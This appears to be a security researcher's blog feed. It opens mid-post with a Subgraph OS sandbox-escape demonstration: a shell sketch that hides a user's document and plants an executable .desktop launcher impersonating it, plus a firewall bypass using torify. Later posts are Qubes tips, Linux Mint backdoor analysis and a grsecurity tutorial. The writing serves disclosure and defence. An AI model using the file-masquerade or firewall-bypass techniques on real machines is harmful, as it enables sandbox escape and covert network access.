<p>When you open a PDF in Subgraph OS, it opens an Evince oz sandbox that only has access to that one document. However, some sandboxes give you write access to an entire folder. For example, the Tor Browser sandbox lets you read and write to <code>~/Downloads/TorBrowser</code>, and the LibreOffice sandbox lets you read and write to <code>~/Documents/LibreOffice</code>.</p>
<p>If you can get sandboxed remote code execution in one of these sandboxes, like by using a Tor Browser or LibreOffice exploit, you can then potentially escalate privileges to get unsandboxed remote code execution by modifying files in those directories.</p>
<p>For example, let’s say the user downloads a malicious Word document and double-clicks it in Nautilus. Subgraph OS will open a LibreOffice oz sandbox and give it access to that document (let’s say, <code>~/Downloads/TorBrowser/resume.docx</code>). Let’s also assume that the user has some legitimate documents, like maybe <code>~/Documents/LibreOffice/draft-proposal.odt</code>.</p>
<p>The payload of the malicious resume.docx could rename draft-proposal.odt to something else, like maybe a hidden file called <code>.DS_Store</code>, and then create a new executable file, <code>draft-proposal.odt.desktop</code>. Later, when the user double-clicks what looks like <code>draft-proposal.odt</code> in Nautilus, the attacker escapes the sandbox. (And the payload can even clean up after itself — move <code>.DS_Store</code> back to <code>draft-proposal.odt</code> and delete <code>draft-proposal.odt.desktop</code> — after installing a backdoor, of course.)</p>
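<p>Concretely, the swap described above is just a few file operations. Here’s a minimal sketch (the paths and the <code>run-payload</code> command are illustrative; to keep it harmless and self-contained, it stages a dummy document in a temp directory standing in for <code>~/Documents/LibreOffice</code>):</p>

```shell
# Stand-in for ~/Documents/LibreOffice, with a dummy legitimate document
DOCS=$(mktemp -d)
touch "$DOCS/draft-proposal.odt"

# Step 1: hide the real document under an innocuous dotfile name
mv "$DOCS/draft-proposal.odt" "$DOCS/.DS_Store"

# Step 2: drop a launcher that impersonates the document; "run-payload"
# is a hypothetical command standing in for the attacker's code
cat > "$DOCS/draft-proposal.odt.desktop" <<'EOF'
[Desktop Entry]
Type=Application
Name=draft-proposal.odt
Icon=libreoffice-writer
Exec=sh -c 'run-payload; mv .DS_Store draft-proposal.odt; rm draft-proposal.odt.desktop'
EOF

# Step 3: make it executable, so Nautilus trusts it and shows Name=/Icon=
chmod +x "$DOCS/draft-proposal.odt.desktop"
```

In a real attack, these commands would run from inside the sandbox that has write access to the folder, which is what makes the escalation possible.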
<p><strong>Bypassing the Subgraph Firewall</strong></p>
<p>The Subgraph Firewall is pretty cool. It’s an application firewall that lets you approve or deny network connections on a process-by-process basis. As I showed in the video, when you open the GNOME Calculator app, it tries making network connections (to look up currency conversion rates), but the firewall intercepts these and lets you deny them.</p>
<p>However, it’s trivial to bypass because it allows all Tor traffic through, no questions asked. For example, if you open a terminal and run <code>curl example.com</code>, the firewall intercepts this connection and gives you the option to deny it:</p>
<p><img src="sgos_firewall1.png" alt=""></p>
<p>But if you run <code>torify curl example.com</code>, it just works. If you check the payload above, you’ll see that all of the internet requests I made use <code>torify</code> to bypass the firewall.</p>
<p>When I pointed this out to the Subgraph devs, they told me that the Subgraph Firewall wasn’t designed to prevent malware from making network connections, but rather just to prevent incidental privacy leaks (such as with the calculator). So they didn’t consider this a valid security issue.</p>
<p>When they show off the Subgraph Firewall on their website, they neglect to mention this limitation:</p>
<p><img src="subgraph_firewall.png" alt=""></p>
<p>They do mention it in the Subgraph OS Handbook, though with a questionable use of the word “sophisticated”:</p>
<blockquote><p>Application firewalls are useful for monitoring unexpected connections from applications. For example, some applications may phone home to the vendor’s website. Often this activity is legitimate (non-malicious) but it still may violate the user’s privacy or expectations of how the software operates. Subgraph Firewall gives users the choice to allow or deny these connections.</p>
<p>Malicious code may also phone home to a website or server that is operated by the hacker or malicious code author. Subgraph Firewall can also alert the user of these connections so that they can be denied.</p>
<p>Application firewalls cannot prevent all malicious code from connecting to the Internet. <strong>Sophisticated malicious code can subvert the allowed connections to bypass the firewall.</strong> However, the firewall may alert the user of connection attempts by less sophisticated malicious code</p>
</blockquote>
<p>They did say that they will probably expand the scope and purpose of the firewall in the future — and they pointed to an <a href="https://github.com/subgraph/fw-daemon/tree/socks-filter">incomplete branch</a> of their firewall code that would allow intercepting Tor traffic to let the user deny it, some day when it’s done.</p>
<p><strong>How this attack would affect Qubes</strong></p>
<p>Qubes is flexible, so how far this attack gets depends on the user’s choices.</p>
<p>In the worst case, the exploit would compromise the sandbox (called an AppVM, in Qubes lingo) that the user opens the document in. This could be their “personal” AppVM full of private data, a “browser” AppVM that has nothing but a web browser profile, or a <a href="https://www.whonix.org/">Whonix</a> AppVM, where all internet traffic is forced to go over Tor. In any of these cases, the attacker will be stuck in a sandbox and won’t be able to compromise other AppVMs. The attacker also won’t be able to query the hardware: they won’t be able to learn the network interface’s MAC address, see nearby wifi access points or bluetooth devices, or anything like that. They won’t be able to access the microphone or webcam.</p>
<p>However, some Qubes users are more careful than that. If the user right-clicks on the fake PDF <code>.desktop</code> file and chooses “Open in DisposableVM”, the hack will fail. DisposableVMs are basically one-time-use sandboxes that work like this: a new sandbox gets created, the file gets copied into it (in this case, the malicious PDF <code>.desktop</code> file), the file gets opened, and when it’s done running, the entire sandbox is deleted. I just tested this out — for me, <code>sgos_handbook.pdf.desktop</code> actually just opens in Atom, a text editor I have installed.</p>
<p><img src="subgraph_dispvm.png" alt=""></p>
<p>Even if the payload executes — if, for example, this were actually a malicious PDF that exploits Evince instead of a <code>.desktop</code> file — it wouldn’t have access to any user data. If the DisposableVM has internet access (which depends on the user’s settings), the payload might be able to phone home, but it won’t be able to tell the attacker anything besides “I’m stuck in a DisposableVM.” It certainly couldn’t take a snapshot from my webcam, record from my mic, or install any sort of persistent malware. And as soon as the program closes, the whole sandbox gets deleted.</p>
<p><strong>Final thoughts</strong></p>
<p>Much of the Qubes vs. Subgraph OS debate has focused on the relative security of the two different types of sandboxing: the Xen hypervisor vs. grsecurity/Linux containers. Which is “more secure” is complicated and subjective.</p>
<p>But what gets lost in the debate is the most important difference between the operating systems: Qubes provides <strong>security by compartmentalization</strong>, while Subgraph OS provides <strong>OS hardening and app sandboxes</strong>. As this exploit hopefully demonstrates, these are <em>not the same thing</em>.</p>
<p>It’s exciting to see an attempt at a security-hardened Linux distro, but it’s no substitute for the compartmentalization that’s made possible by Qubes.</p>
<hr>
<p><em><strong>Update April 12, 2017</strong></em></p>
<p>Subgraph <a href="https://twitter.com/subgraph/status/851843464115441664">pointed out a typo</a> in this blog post and <a href="https://twitter.com/subgraph/status/851846268984987648">stated</a> that this attack is possible because of an outstanding vulnerability in Nautilus. One Subgraph developer <a href="https://twitter.com/bleidl/status/851849723002703873">claimed</a> that this isn’t a bug in Subgraph OS, <a href="https://twitter.com/bleidl/status/851851948710141952">said</a> that Qubes was just as vulnerable (it’s <a href="https://twitter.com/isislovecruft/status/851890009057710080">not</a>), and <a href="https://twitter.com/bleidl/status/851852258761465860">said</a>, “Do I have to make a video too?” (please do!).</p>
<p>But then last night, Subgraph <a href="https://twitter.com/subgraph/status/852000407253594114">fixed</a> this not-a-bug in Subgraph OS! The update is already available to users.</p>
<p><img src="Screenshot_2017-04-12_12-29-49.png" alt=""></p>
<p>I tested it out, and it works great (I can’t wait until this patch hits Debian and Fedora, too). I made this little animated GIF to show what <code>sgos_handbook.pdf.desktop</code> now looks like in Nautilus. When the file is executable, Nautilus still displays it as a <code>.desktop</code> file; when you open it, Nautilus displays a warning; and only if you click through the warning does the file get to masquerade as a PDF:</p>
<p><img src="nautilus.gif" alt=""></p>
<p>This is excellent and fixes this specific issue, but it doesn’t fix the more fundamental problem with Subgraph OS’s attempt to be an “adversary resistant OS”: most software still doesn’t run inside a sandbox. A future bug in Nautilus or another unsandboxed app (or tricking the target into installing a malicious <code>pip</code> package the attacker controls, etc.) will still allow the attacker to take over the computer.</p>
Qubes Tip: Making Yubikey OpenPGP smart cards slightly more usable2016-12-01T00:00:00ZMicah Leeurn:uuid:e5f1845c-472b-3144-b8dc-530fa8f888e4<p>Qubes 3.2 has support for <a href="https://www.qubes-os.org/doc/usb/#attaching-a-single-usb-device-to-a-qube-usb-passthrough">USB passthrough</a>. This one feature has made Qubes <em>so much</em> more useful for me. It means that a wide variety of devices — from my laptop’s internal webcam, to plugging in smartphones to transfer data or do Android development — are finally supported. I used to have to use a separate non-Qubes computer for several tasks that I can now more conveniently and securely do within Qubes.</p>
<p>One way that I use USB passthrough on a daily basis is with my Yubikey. (If you’re unfamiliar, Yubikeys are small USB devices that can be used for two-factor authentication, for storing and typing static passwords, and as OpenPGP smart cards.) Normally when you use GnuPG, you keep your secret key in a file stored in <code>~/.gnupg</code>. If you use an OpenPGP smart card, you don’t have your secret key on your computer at all — instead it’s stored on your smart card. With a smart card you can still use your secret key to decrypt or sign messages, but the card is designed to make it impossible to export the key itself.</p>
<p>If you use the Qubes <a href="https://www.qubes-os.org/doc/split-gpg/">split-gpg</a> setup, in which your email client runs in a VM with internet access and your <code>~/.gnupg</code> directory with all of your keys lives in a separate, network-less VM (called, for example, <code>gpgvm</code>), you’re going to need to attach your Yubikey USB device to that VM every time you plug it in. And, because of how the <code>qvm-usb</code> tool for USB passthrough works, the command you need to run to do this will be different depending on which USB port you plug your Yubikey into.</p>
<p>To make things simpler for me, I wrote a script that I keep in <code>dom0</code> at <code>/usr/local/bin/yubi</code>. After I plug in my Yubikey, I press Alt-F2, type “yubi”, and press enter, and it attaches my Yubikey to my gpgvm. It doesn’t matter what USB port I’ve plugged my Yubikey into (it even works fine with USB hubs). If I run <code>yubi</code> when my Yubikey is already attached to my <code>gpgvm</code>, it detaches and then re-attaches it, which should clear up any problems. I thought I’d share it. Here’s the script:</p>
<pre><code>#!/bin/bash
# Find the Yubikey in the qvm-usb device list
USB_DEVICE=$(qvm-usb | grep Yubikey | cut -f1)
# If it's already attached to gpgvm, detach it first
if qvm-usb | grep "$USB_DEVICE" | grep -q "(attached to gpgvm)"; then
    echo "detaching yubikey"
    qvm-usb -d "$USB_DEVICE"
    sleep 1
fi
echo "attaching yubikey"
qvm-usb -a gpgvm "$USB_DEVICE"
</code></pre>
<p>One final note: When you plug your Yubikey into your computer (and you’re using a <a href="https://www.qubes-os.org/doc/usb/#creating-and-using-a-usb-qube">USB qube</a>), a question might pop up in a <code>dom0</code> window asking if you’d like to allow the USB keyboard you plugged in to <code>sys-usb</code> to type in <code>dom0</code>. This is because Yubikeys advertise themselves as USB keyboards — this makes it possible to press the button on the Yubikey to type a two-factor authentication code.</p>
<p><img src="qubes-usb-question.png" alt="Qubes, protecting you from malicious USB devices pretending to be keyboards"></p>
<p>After you run the yubi script, the same question in <code>dom0</code> will pop up, but this time asking if you want to allow the keyboard from gpgvm to type in <code>dom0</code>. You can customize how all of this works by editing the file <code>/etc/qubes-rpc/policy/qubes.InputKeyboard</code> in <code>dom0</code>. Here’s what mine looks like:</p>
<pre><code>gpgvm dom0 deny
$anyvm $anyvm ask
</code></pre>
<p>This means: never allow keyboards attached to <code>gpgvm</code> to type in <code>dom0</code>, and ask in all other situations.</p>
How Qubes makes handling PDFs way safer2016-07-21T00:00:00ZMicah Leeurn:uuid:a4489882-c246-3ce5-aca4-18c76756ea43<p>Bart Gellman asked me on Twitter how to make PDFs safe to open. This is an excellent question, especially for a Pulitzer-winning surveillance/national security reporter who needs to open documents from random people on the internet, who may be trying to hack him or may be a valuable new source. PDFs, and all other document formats, can be terribly dangerous, and opening a malicious one can let an attacker take over your computer.</p>
<p>He was specifically asking if <a href="https://firstlook.org/code/project/pdf-redact-tools/">PDF Redact Tools</a>, a tool that I developed to securely redact documents, could be used in Tails to safely sanitize potentially-malicious PDFs before opening them. Yes, it can, but Qubes offers built-in tools that do a better job of this, more securely and with much less hassle.</p>
<p>The two key features are: “Open in Disposable VM” and “Convert to Trusted PDF”.</p>
<p><strong>Open in Disposable VM</strong></p>
<p>In Qubes, you run all of your software in VMs, and it’s up to you to decide how to organize them. I have a VM called “email” that I use to check my email, and nothing else.</p>
<p>Qubes comes with a Thunderbird extension that makes it simple to open email attachments in disposable VMs. It also comes with a file manager extension that lets you right-click on a file to open it in a disposable VM.</p>
<p>It’s absurdly easy to use. I’ll use a sketchy piece of potentially-malicious spam to demonstrate:</p>
<p><img src="sketchy-attachment.png" alt="sketchy attachment"></p>
<p>Notice the window decorations of my Thunderbird window. It has a blue border (because that’s the color I chose) and says “[email]” in the window, to let me know that I’m running this program in my email VM.</p>
<p>And here’s the window that opens:</p>
<p><img src="sketchy-attachment-dispvm.png" alt="sketchy attachment DispVM"></p>
<p>Here’s what happened:</p>
<ul>
<li>Qubes created a brand new VM that doesn’t have any data in it at all</li>
<li>Then it copied this file <code>AWARD NOTIFICATION.pdf</code> to this new VM</li>
<li>Then it opened the PDF in the new VM</li>
<li>When I closed the window, Qubes deleted that disposable VM</li>
</ul>
<p>Check the window title. This PDF is open in a VM called “disp11”. When I close the window, the VM shuts down and gets deleted. If the PDF were malicious and tried to hack me, and the hack successfully exploited my PDF reader (Evince, in this case), it would still fail. The exploit wouldn’t have access to any of my data at all, and as soon as I closed the window it would be deleted forever.</p>
<p>There’s a setting in the Qubes Thunderbird extension to open all email attachments in disposable VMs. And this works with any type of document, not just PDFs.</p>
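<p>If you prefer the terminal, the same mechanism is available from any AppVM with the <code>qvm-open-in-dvm</code> tool (the filename here is just the example from above):</p>
<pre><code>user@email:~$ qvm-open-in-dvm "AWARD NOTIFICATION.pdf"
</code></pre>
<p>Qubes spins up a fresh disposable VM, copies the file in, opens it, and deletes the VM when you close the viewer, exactly like the Thunderbird and file manager extensions do.</p>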
<p><strong>Convert to Trusted PDF</strong></p>
<p>Qubes also has a feature that’s similar to what Bart wanted to use PDF Redact Tools for: converting an unknown PDF into one that you can safely open on any computer, even one running Windows or OS X with a vulnerable version of Adobe Reader.</p>
<p>In this example, I’ve downloaded a PDF from Cryptome, and I have no idea if it’s malicious or not. I could choose to just open it in my PDF reader, to open it in a disposable VM, or to convert it to a PDF that I can trust.</p>
<p><img src="trusted-pdf.png" alt="trusted pdf"></p>
<p>First, notice the window decorations. This is the file manager running in my “browser” VM, and I chose the window color yellow.</p>
<p>Right-clicking on the PDF and choosing “Convert To Trusted PDF” does something similar to what PDF Redact Tools does, but it will do it in a more secure way, because it can, because it’s running in Qubes. The short version is this:</p>
<ul>
<li>Qubes creates a new disposable VM</li>
<li>It copies the document <code>fbi-cia-ssci-saudi.pdf</code> to it</li>
<li>It does a complicated process to flatten and remove anything malicious from the PDF (it does a better job than PDF Redact Tools, which simply runs the ImageMagick “convert” tool, meaning that a PDF especially crafted to attack ImageMagick rather than Adobe Reader could still hack your computer)</li>
<li>It copies the trusted PDF back to the VM</li>
<li>It moves the original PDF to <code>~/QubesUntrustedPDFs</code> in the VM you’re using (browser, in my case), and it names the trusted PDF <code>fbi-cia-ssci-saudi.trusted.pdf</code></li>
</ul>
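<p>There’s also a command-line equivalent of the right-click menu item, <code>qvm-convert-pdf</code>, which you run from the VM that holds the untrusted file:</p>
<pre><code>user@browser:~$ qvm-convert-pdf fbi-cia-ssci-saudi.pdf
</code></pre>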
<p>If you want a much more detailed explanation of what’s going on, check out Joanna Rutkowska’s <a href="https://theinvisiblethings.blogspot.com/2013/02/converting-untrusted-pdfs-into-trusted.html">blog post on the topic</a>.</p>
<p>There are two annoying downsides to trusted PDFs: In order to make the PDF safe, Qubes completely flattens it, which means you can no longer select any text from it. You’ll have to OCR it if you want the text layer back. And it makes the file size bigger, sometimes much bigger. The original <code>fbi-cia-ssci-saudi.pdf</code> is 624 KB, but <code>fbi-cia-ssci-saudi.trusted.pdf</code> is 2.3 MB.</p>
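<p>If you do want the text layer back, one option (assuming you install it yourself; it isn’t part of Qubes) is a command-line OCR tool such as <code>ocrmypdf</code>:</p>
<pre><code>user@browser:~$ ocrmypdf fbi-cia-ssci-saudi.trusted.pdf fbi-cia-ssci-saudi.ocr.pdf
</code></pre>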
<p><em>Update:</em> There’s a <a href="https://groups.google.com/forum/#!topic/qubes-users/qSiLD4jTXtQ">minor correction</a> from Qubes developer Marek Marczykowski-Górecki:</p>
<blockquote><p>“It copies the trusted PDF back to the VM” – that would mean that compromised DispVM (by the very same PDF) could pass it back unmodified instead of the sanitized one. It isn’t what is done there – it pass only very simple representation of the file (bitmap in this case), then reassemble PDF in the calling VM.</p>
</blockquote>
<p><strong>You can still get hacked with Qubes</strong></p>
<p>These Qubes features are awesome and will protect you from just about 100% of random drive-by attacks. But like everything on computers, it’s still possible for an attacker with the right exploits to hack you, even if you’re using Qubes.</p>
<p>They would need:</p>
<ol>
<li>An exploit for the program you’re using to open the document. In Qubes, the default PDF reader is Evince, but you can obviously use whichever software you think is safest.</li>
<li>An exploit for Xen, which is the hypervisor that Qubes uses. These exploits are rare, but certainly happen. (Like this recent incredibly scary one.)</li>
<li>A payload that’s specifically targeted against Qubes.</li>
</ol>
<p>The Qubes developers are completely on top of security updates. If you keep dom0 and all of your template VMs up-to-date, using disposable VMs and converting to trusted PDFs will protect you from all but the most persistent and well-resourced attackers.</p>
Qubes Tip: Opening links in your preferred AppVM2016-06-22T00:00:00ZMicah Leeurn:uuid:f67fa883-bc99-37e2-8b3c-e83906a4f236<p>If you use Qubes like I do, you have many different AppVMs to compartmentalize different programs. You might have one VM for your email client, one for your jabber client, one for your password database. But if you click a link in any of these programs, it sure would be nice if that link opened in the browser VM of your choice. This isn’t all that hard to set up.</p>
<p>The command <code>qvm-open-in-vm</code> lets you open a document or a URL in another VM.</p>
<pre><code>user@dev:~$ qvm-open-in-vm
Usage: /usr/bin/qvm-open-in-vm vmname filename
</code></pre>
<p>If you have a terminal open in your dev VM and want to load <a href="https://micahflee.com/">https://micahflee.com/</a> in your browser VM, you can do it like this:</p>
<pre><code>user@dev:~$ qvm-open-in-vm browser https://micahflee.com
</code></pre>
<p>You get a prompt in <code>dom0</code> asking if you really want to allow this cross-VM behavior. When you choose yes, a new tab loading my website opens in your default browser in your browser VM.</p>
<p><img src="qubes-links.png" alt="qubes.OpenURL"></p>
<p>Excellent. Now let’s say you want this to automatically happen every time you click any link. You can do this by creating a <code>.desktop</code> file that advertises itself as a handler for http/https links, and then setting this as your default browser.</p>
<p>Open a text editor and copy and paste this into it:</p>
<pre><code>[Desktop Entry]
Encoding=UTF-8
Name=BrowserVM
Exec=qvm-open-in-vm browser %u
Terminal=false
X-MultipleArgs=false
Type=Application
Categories=Network;WebBrowser;
MimeType=x-scheme-handler/unknown;x-scheme-handler/about;text/html;text/xml;application/xhtml+xml;application/xml;application/vnd.mozilla.xul+xml;application/rss+xml;application/rdf+xml;image/gif;image/jpeg;image/png;x-scheme-handler/http;x-scheme-handler/https;
</code></pre>
<p>Replace <code>browser</code> in the line that says <code>Exec=qvm-open-in-vm browser %u</code> with whatever AppVM you want to open links in. Save this file to <code>~/.local/share/applications/browser_vm.desktop</code>.</p>
<p>Finally, set it as your default browser (like I’m doing here in my email VM):</p>
<pre><code>user@email:~$ xdg-settings set default-web-browser browser_vm.desktop
</code></pre>
<p>Now whenever you click a link in a program running in this VM (such as Thunderbird), it will open that link in your browser VM.</p>
Backdoored Linux Mint, and the Perils of Checksums2016-02-20T00:00:00ZMicah Leeurn:uuid:10372d2b-bfdb-3e7e-a896-972da8e740d5<p>Someone hacked the website of Linux Mint — which, according to <a href="https://stats.wikimedia.org/wikimedia/squids/SquidReportOperatingSystems.htm">Wikipedia’s traffic analysis report</a> is the 3rd most popular desktop Linux distribution after Ubuntu and Fedora — and replaced links to ISO downloads with a backdoored version of the operating system. This <a href="http://blog.linuxmint.com/?p=2994">blog post</a> explains the situation.</p>
<p>From the post and comments, the key points include:</p>
<ul>
<li>Links to the malicious version of the ISO were added, detected, and removed on the same day, February 20. If you’re already running Linux Mint, this doesn’t affect you — all files installed or updated using the package manager are digitally signed and the signatures are verified.</li>
<li>Linux Mint 17.3 Cinnamon was the only version that was compromised</li>
<li>The website was hacked because of a WordPress exploit. Project leader Clement Lefebvre says, “Yes, the breach was made via wordpress. From there they got a www-data shell.”</li>
<li>The backdoored ISO contains Linux Mint with <a href="http://blog.malwaremustdie.org/2013/05/story-of-unix-trojan-tsunami-ircbot-w.html">Tsunami botnet malware</a> running on it.</li>
</ul>
<p>The blog post includes instructions for checking your ISO files to ensure that they’re valid by comparing MD5 checksums. MD5 checksums!</p>
<p>Besides the fact that the website isn’t available over HTTPS — so network attackers could change those MD5 checksums to whatever they want as you load the blog post — <a href="https://en.wikipedia.org/wiki/MD5#Security">MD5 is entirely broken</a> and has been for many years. MD5 should never be relied on for verifying that you have the legitimate version of a file. It would not be difficult for someone to generate a backdoored Linux Mint ISO that has the same MD5 checksum as the legitimate ISO. Likewise, while SHA1 is considerably stronger, it also should not be used for security purposes anymore. Wikipedia’s <a href="https://en.wikipedia.org/wiki/SHA-1">SHA1 article</a> says: “SHA-1 is no longer considered secure against well-funded opponents.”</p>
<p>It would be great if the Linux Mint project could completely stop relying on MD5 and start using a checksum algorithm that is considered secure today, like SHA256.</p>
<p>But it’s also important to note that comparing the checksum of a file you downloaded with what you see on the website you downloaded it from isn’t secure either, even if you are using SHA256. If a hacker can hack the website to modify the download link, they can modify the checksum at the same time to match their malicious download.</p>
<p>The only solution to this problem is to use public key cryptography. The ISOs should be digitally signed with an OpenPGP secret key, and users should verify the signature using the associated public key. Linux Mint does in fact sign releases with a PGP key, but there’s no information on the download page about this, or about how to go about verifying the signature.</p>
<p>If you look at the directory structure in the Linux Mint folder on one of the download mirrors, like <a href="http://mirrors.kernel.org/linuxmint/stable/17.3/">http://mirrors.kernel.org/linuxmint/stable/17.3/</a> for example, you’ll see a bunch of ISO files as well as sha256sum.txt and sha256sum.txt.gpg. The sha256sum.txt file includes SHA256 checksums of all of the ISO files, and you can use sha256sum.txt.gpg to verify the signature of that file.</p>
<p>This appears to be the signing key:</p>
<pre><code>pub dsa1024/0FF405B2 2009-04-29 [SC]
Key fingerprint = E1A3 8B8F 1446 75D0 60EA 666F 3EE6 7F3D 0FF4 05B2
uid [ unknown] Clement Lefebvre (Linux Mint Package Repository v1)
sub elg2048/0F346519 2009-04-29 [E]
</code></pre>
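<p>Putting the pieces together, verification on the command line looks roughly like this (a sketch; you still need to confirm the key’s fingerprint out-of-band before trusting it):</p>
<pre><code>$ gpg --recv-keys E1A38B8F144675D060EA666F3EE67F3D0FF405B2
$ gpg --verify sha256sum.txt.gpg sha256sum.txt
$ sha256sum -c sha256sum.txt 2>/dev/null | grep 'OK$'
</code></pre>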
<p>Verifying PGP signatures is more complicated and harder to explain than comparing checksums, but it’s actually secure. It’s the only way to be sure that a Linux installer ISO you download hasn’t been tampered with since the image was built by the developers. Tails is an example of an operating system that does an <a href="https://tails.boum.org/download/index.en.html#verify">excellent job</a> at explaining how to verify PGP signatures when you download their ISO.</p>
Usable Crypto Capture the Flag Challenge2016-02-06T00:00:00ZMicah Leeurn:uuid:a2f411c0-2299-35e8-9fab-05c5a27a0275<p>Last week, during USENIX’s first <a href="https://www.usenix.org/conference/enigma2016">Enigma conference</a>, EFF hosted a small Capture the Flag hacking competition. I designed one of the challenges myself, entitled Usable Crypto. It requires you to use PGP as an attacker rather than a defender. It’s on the easy side, as far as CTF challenges go, and I think many people who have absolutely no hacking skills but some fumbling-around-with-PGP skills could beat it without too much trouble. And it might even demonstrate why verifying fingerprints really is rather important.</p>
<p>If you’d like to give it a go, it’s live at <a href="https://usable-crypto.ctf.micahflee.com/">https://usable-crypto.ctf.micahflee.com/</a>. The plot for Enigma’s CTF was loosely based on Cory Doctorow’s novel Little Brother. You’re an X-NET hacker fighting the surveillance state’s Department of National Security. You win when you capture the flag, which is a string of text that starts with “FLAG_” (but please don’t post it in the comments).</p>
Hardening Debian for the Desktop Using Grsecurity2016-01-15T00:00:00ZMicah Leeurn:uuid:ac3e4536-e302-32d3-81f9-c92bca06b5fa<p>I recently built a desktop system that I think is reasonably secure. It’s running Debian sid, also known as “unstable” — though in the Debian desktop world that just means you get to use the newest software. It’s just about as stable as “stable”, and besides, #yolo. It’s also running a <a href="https://grsecurity.net/">grsecurity</a>-patched Linux kernel and <a href="https://en.wikipedia.org/wiki/Grsecurity#PaX">PaX</a>, technologies that make Linux way more secure. Grsecurity protects you against memory corruption attacks, such as buffer overflows.</p>
<p>Last October I traveled to Moscow and <a href="https://theintercept.com/2015/11/12/edward-snowden-explains-how-to-reclaim-your-privacy/">interviewed Edward Snowden</a>. Here’s one of the things he told me:</p>
<blockquote><p>“Something that we haven’t seen that we need to see is a greater hardening of the overall kernels of every operating system through things like grsecurity, but unfortunately there’s a big usability gap between the capabilities that are out there, that are possible, and what is attainable for the average user.”</p>
</blockquote>
<p>Since I just set up Debian with a grsec kernel, I figured I’d write a tutorial for how to do it. There’s still a long way to go before the average user can take advantage of this stuff – it breaks things, and you need to learn how to diagnose and fix them yourself – but I think that it’s well within the capabilities of Linux nerds who are comfortable using a terminal. You can probably also follow along no matter what Linux distribution you’re using. Also, I’m fairly new to grsecurity myself, so if you have tips or suggestions, or if I got something wrong, please post in the comments.</p>
<p>Grsecurity can be used with very little configuration. Just by baking it into your kernel, entire classes of exploits will fail to work against you, but those same exploits will succeed against someone running a vanilla Linux kernel. Grsecurity also lets you enforce access controls, but that’s outside the scope of this article. Just running a grsec kernel gives you a lot of protection for free.</p>
<p>First, I’m going to explain a little bit about what grsec is and how it protects you. Then I’m going to install Debian and upgrade it to sid. Then I’m going to download the Linux source code and the grsecurity patch, verify digital signatures, patch the Linux kernel, and finally compile it. (If you’ve never compiled the Linux kernel before, you’re in for a treat!) Then I’m going to show you how to use paxctl to turn off certain PaX protections on specific binaries so that they can run without crashing. And finally, I’m going to briefly show you how to troubleshoot grsec and PaX, so you can make software work that would otherwise crash, all on your own.</p>
<p><strong>How does grsecurity make Linux more secure?</strong></p>
<p>Memory corruption attacks normally work something like this: The target accepts malicious input into a program (maybe they load a GIF in an image viewing program, or a document in LibreOffice, or a malformed PGP public key in GnuPG). This input includes an exploit – some code that triggers a security bug in whatever software it’s targeting – as well as a small block of malicious code called shellcode. When the buggy software parses the input, the exploit takes over the flow of execution and jumps into the attacker’s shellcode. Shellcode can do many different things, but it commonly gives the attacker a remote shell – basically, letting them run commands on the victim’s computer (with the permissions of the user who was running the program that got hacked).</p>
<p>Grsecurity protects you by being extremely strict about which parts of memory are allowed to get executed. If it sees a program try to execute some code in the wrong part of memory, it kills the process, which will thwart attacks. So if a target using a grsec-patched kernel loads a malicious PDF in a vulnerable PDF reader, and it exploits a bug and tries to jump to shellcode, grsec will kill the process and log this to <code>/var/log/syslog</code>.</p>
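<p>That logging is also your main debugging tool: if a program dies mysteriously under grsec, you can check whether PaX killed it (the exact message format may vary between grsec versions):</p>
<pre><code>$ grep 'PAX: terminating task' /var/log/syslog
</code></pre>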
<p>Unfortunately, grsec doesn’t know which programs are <em>supposed</em> to jump into user-loaded memory – it turns out quite a few programs do. For example, web browsers are able to load websites that include JavaScript. In order to improve performance, they convert the JavaScript code to machine code and then jump into it to execute it (this is called Just In Time compilation, or JIT). When grsec notices this, it will kill your web browser process.</p>
<p>You can still run a web browser with grsec, but you need to set a PaX flag (more on this below) to disable memory protections on that specific executable binary. This means your browser won’t immediately crash when you open it, but it also means that if an attacker is able to exploit a bug in it, they may be able to succeed in running their shellcode. Likewise, you often need to disable memory protection on programming language interpreters, such as <code>/usr/bin/python2</code>, <code>/usr/bin/python3</code>, and <code>/usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java</code>.</p>
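<p>As a preview of what setting that flag looks like in practice, disabling MPROTECT on a single binary with <code>paxctl</code> goes roughly like this (the browser path is just an example — substitute whatever binary is crashing):</p>
<pre><code># add a PT_PAX_FLAGS program header to the binary, then disable MPROTECT
$ sudo paxctl -cm /usr/lib/chromium/chromium
# view the flags that are now set
$ paxctl -v /usr/lib/chromium/chromium
</code></pre>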
<p>So it’s not perfect. But even with disabling memory protections on specific binaries, you still get a lot of protection. Most programs work fine without having to disable any protections, and grsec makes it extremely hard for an attacker to escalate privileges. So if someone does manage to hack your web browser and get a shell, grsec will probably prevent them from getting root. Or if you’re a web developer and are running Apache with an old vulnerable WordPress on it that someone on your wifi notices and hacks, grsec will probably prevent them from accessing any data that isn’t readable from the <code>www-data</code> user, even if they come armed with Linux privilege escalation exploits.</p>
<p><strong>Installing Debian sid</strong></p>
<p>Debian doesn’t release sid installation images. Instead you need to install an earlier version of Debian and upgrade to sid. So go and grab the <a href="https://www.debian.org/distrib/netinst">latest stable netinst iso</a>, probably the amd64 one.</p>
<p>You also may want to verify the signature of the iso. As of this writing, the latest stable is 8.2.0, and the iso URL is <code>http://cdimage.debian.org/debian-cd/8.2.0/amd64/iso-cd/debian-8.2.0-amd64-netinst.iso</code>. If you drop the filename part of the path and just load <code>http://cdimage.debian.org/debian-cd/8.2.0/amd64/iso-cd/</code>, you’ll see several files to download, including <code>SHA512SUMS</code> and <code>SHA512SUMS.sign</code>. Download both of those. The <code>SHA512SUMS</code> file contains SHA512 checksums of all of the isos for that version of Debian, including <code>debian-8.2.0-amd64-netinst.iso</code>.</p>
<p>Make sure you have the key that Debian uses to sign their releases. You can <a href="https://www.debian.org/CD/verify">find its fingerprint here</a>. For Debian 8, the signing key fingerprint is <code>DF9B 9C49 EAA9 2984 3258 9D76 DA87 E80D 6294 BE9B</code> (as of the time of writing), and you can get the key by running this:</p>
<pre><code>$ gpg --recv-keys DF9B9C49EAA9298432589D76DA87E80D6294BE9B
</code></pre>
<p>Now you can verify the signature:</p>
<pre><code>$ gpg --verify SHA512SUMS.sign
gpg: assuming signed data in 'SHA512SUMS'
gpg: Signature made Fri 11 Sep 2015 08:13:34 AM PDT using RSA key ID 6294BE9B
gpg: Good signature from "Debian CD signing key <debian-cd@lists.debian.org>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg: There is no indication that the signature belongs to the owner.
Primary key fingerprint: DF9B 9C49 EAA9 2984 3258 9D76 DA87 E80D 6294 BE9B
</code></pre>
